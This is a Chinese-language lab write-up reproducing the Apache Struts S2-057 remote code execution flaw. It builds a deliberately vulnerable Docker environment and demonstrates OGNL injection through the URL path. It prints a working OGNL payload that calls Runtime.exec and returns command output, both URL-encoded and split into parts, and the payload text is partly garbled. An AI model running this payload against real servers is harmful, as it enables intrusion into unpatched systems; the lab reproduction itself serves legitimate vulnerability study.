St2-057遠程代碼執行漏洞復現過程
0x01 搭建環境docker
https://github.com/vulhub/vulhub/tree/master/struts2/s2-048
docker-compose up -d
0x02 搭建st2-057漏洞環境
docker exec -i -t 88fd8d560155 /bin/bash
後臺啟動進入docker
根據公告 https://struts.apache.org/releases.html
Release Release Date Vulnerability Version Notes Struts 2.5.16 16 March 2018 S2-057Version notes Struts 2.5.14.1 30 November 2017 Version notes Struts 2.5.14 23 November 2017 S2-055, S2-054 Version notes
Struts 2.5.16存在s2-057漏洞,然後去下載這個版本
https://fossies.org/linux/www/legacy/struts-2.5.16-all.zip/
apt-get update -y mkdir /usr/local/tomcat/webapps/test wget https://fossies.org/linux/www/legacy/struts-2.5.16-all.zipapt-get install unzip -y cp struts2-showcase.war /usr/local/tomcat/webapps/
0x03 修改配置文件
先查找文件struts-actionchaining.xml,發現有2處需要修改
root@88fd8d560155:/usr/local/tomcat/webapps/test# locate struts-actionchaining.xml /usr/local/tomcat/webapps/struts2-showcase/WEB-INF/classes/struts-actionchaining.xml /usr/local/tomcat/webapps/struts2-showcase/WEB-INF/src/java/struts-actionchaining.xml/usr/local/tomcat/webapps/test/struts-2.5.16/src/apps/showcase/src/main/resources/struts-actionchaining.xml root@88fd8d560155:/usr/local/tomcat/webapps/test#
配置文件修改-參考鏈接: https://lgtm.com/blog/apache_struts_CVE-2018-11776
改為如下所示:
<struts> <package name="actionchaining" extends="struts-default"> <action name="actionChain1" class="org.apache.struts2.showcase.actionchaining.ActionChain1"> <result type="redirectAction"> <param name = "actionName">register2</param> </result> </action> </package> </struts>
然後去bin目錄,kill掉進程,因為修改了配置文件,所以需要重啟服務
root@88fd8d560155:/usr/local/tomcat/bin# cd /usr/local/tomcat/bin/ root@88fd8d560155:/usr/local/tomcat/bin# ls bootstrap.jar catalina.sh commons-daemon.jar daemon.sh setclasspath.sh startup.sh tool-wrapper.sh catalina-tasks.xml commons-daemon-native.tar.gz configtest.sh digest.sh shutdown.sh tomcat-juli.jar version.sh root@88fd8d560155:/usr/local/tomcat/bin# ./shutdown.sh
0x04 重啟服務,st2-057搭建完成
? ? root@HK ~/vulhub/struts2/s2-048 master ● docker-compose up -d Starting s2-048_struts2_1 ... done ? root@HK ~/vulhub/struts2/s2-048 master ●
0x05 驗證st2-057
docker 靶機:http://www.canyouseeme.cc:8080/struts2-showcase/
命令執行:http://www.canyouseeme.cc:8080/struts2-showcase/${(111+111)}/actionChain1.action
${(111+111)}
得到執行結果返回在url中:http://www.canyouseeme.cc:8080/struts2-showcase/222/register2.action
Ps: ${(111+111)} 可以替換成以前的poc,例如S2-032
http://www.canyouseeme.cc:8080/struts2-showcase/%24%7b(%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c%23a%3d%40java.lang.Runtime%40getRuntime().exec(%27calc%27).getInputStream()%2c%23b%3dnew+java.io.InputStreamReader(%23a)%2c%23c%3dnew++java.io.BufferedReader(%23b)%2c%23d%3dnew+char%5b51020%5d%2c%23c.read(%23d)%2c%23jas502n%3d+%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23jas502n.println(%23d+)%2c%23jas502n.close())%7d/actionChain1.action
poc-example:
${(#_memberAccess["allowStaticMethodAccess"]=true,#[email protected]@getRuntime().exec(‘calc‘).getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[51020],#c.read(#d),#jas502n= @org.apache.struts2.ServletActionContext@getResponse().getWriter(),#jas502n.println(#d ),#jas502n.close())}
拆分
${ ( #_memberAccess["allowStaticMethodAccess"]=true, #a[email protected]@getRuntime().exec(‘calc‘).getInputStream(), #b=new java.io.InputStreamReader(#a), #c=new java.io.BufferedReader(#b), #d=new char[51020], #c.read(#d), #jas502n= @org.apache.struts2.ServletActionContext@getResponse().getWriter(), #jas502n.println(#d), #jas502n.close()) }
0x06 參考鏈接
https://github.com/vulhub/vulhub/tree/master/struts2/s2-048 https://lgtm.com/blog/apache_struts_CVE-2018-11776 https://cwiki.apache.org/confluence/display/WW/S2-057 https://www.anquanke.com/post/id/157518
St2-057遠程代碼執行漏洞復現過程